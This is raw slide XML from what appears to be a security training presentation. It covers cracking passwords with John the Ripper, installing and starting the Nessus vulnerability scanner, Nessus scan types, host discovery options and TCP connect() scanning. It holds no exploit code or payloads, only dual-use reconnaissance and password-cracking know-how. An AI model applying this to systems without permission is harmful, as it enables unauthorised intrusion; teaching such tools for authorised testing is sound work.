          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="809775"/>
            <a:ext cx="7999500" cy="3725699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Takes a while.  3 more passwords</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="240" name="Shape 240"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="56503"/>
            <a:ext cx="8229600" cy="857400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>Breaking In: John without wordlist</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="241" name="Shape 241"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1435597"/>
            <a:ext cx="9143999" cy="3707903"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="242" name="Shape 242"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185875" y="4157875"/>
            <a:ext cx="3958134" cy="857399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="247" name="Shape 247"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2840053"/>
            <a:ext cx="7772400" cy="784799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The Handsome Seastars</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="248" name="Shape 248"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1583342"/>
            <a:ext cx="7772400" cy="1159799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Nessus</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2" name="Shape 252"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="253" name="Shape 253"/>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Downloading Nessus Home</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="254" name="Shape 254"/>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t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="255" name="Shape 255"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="936137" y="1132362"/>
            <a:ext cx="7271722" cy="3861274"/>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9" name="Shape 259"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="260" name="Shape 26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Depackaging + Starting Nessus</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="261" name="Shape 261"/>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en"/>
              <a:t>Nessus is </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>not</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>installed by default!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> available in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>APT repos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>dpkg -i</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>service nessusd start</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>https://localhost:8834</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="262" name="Shape 262"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="17722" l="57106" r="4745" t="43165"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3967951" y="1366100"/>
            <a:ext cx="5003899" cy="3393776"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="263" name="Shape 263"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="84859" l="0" r="88155" t="12982"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4693250" y="1200150"/>
            <a:ext cx="2959675" cy="356749"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>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 name="Shape 267"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="268" name="Shape 268"/>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Nessus Initial Account Setup</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="269" name="Shape 269"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1200150"/>
            <a:ext cx="8686800" cy="3943199"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Select a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>username and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hit </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Continue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="36666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and let Nessus download vulnerability definitions.  Don’t close the window!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="270" name="Shape 270"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="27561" l="30541" r="30541" t="39650"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3403699" y="1200149"/>
            <a:ext cx="5283100" cy="2944250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>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 name="Shape 274"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275" name="Shape 275"/>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Types of Vulnerability Scans</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="276" name="Shape 276"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1200000"/>
            <a:ext cx="3424199" cy="3943499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Cloud**</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="2400"/>
              <a:t>Shellshock</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Basic Network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Credentialed Patch (missing updates)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="2400"/>
              <a:t>GHOST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>PCI DSS vulns**</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Mobile Device Man.**</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="277" name="Shape 277"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5262600" y="1352550"/>
            <a:ext cx="3424199" cy="2769900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Mobile Devices**</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Network Offline Config Audit**</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>SCAP, OVAL Audits**</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Web App Vulns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Win32 Malware</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="278" name="Shape 278"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5262600" y="4411625"/>
            <a:ext cx="5218799" cy="635999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>** requires Nessus Pro or higher.</a:t>
            </a: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2" name="Shape 282"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="283" name="Shape 283"/>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Host Discovery Options</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="284" name="Shape 284"/>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i="1" lang="en" sz="1800"/>
              <a:t>General</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Test local host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Use fast network discovery (bypasses proxy, load balancer tests)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="1800"/>
              <a:t>Ping Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ARP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>TCP (specify ports)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ICMP (bypass unreachable, set # retries)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>UDP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="1800"/>
              <a:t>Fragile Devices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Scan network printers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Novell Netware hosts (largely abandoned anyway)</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 name="Shape 47"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Shape 48"/>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Scanning Methods</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Shape 49"/>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i="1" lang="en"/>
              <a:t>TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>connect()</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t> Scan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>(no args)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Most basic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Can be parallelized → fastest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>No root required</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Calls OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>connect() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
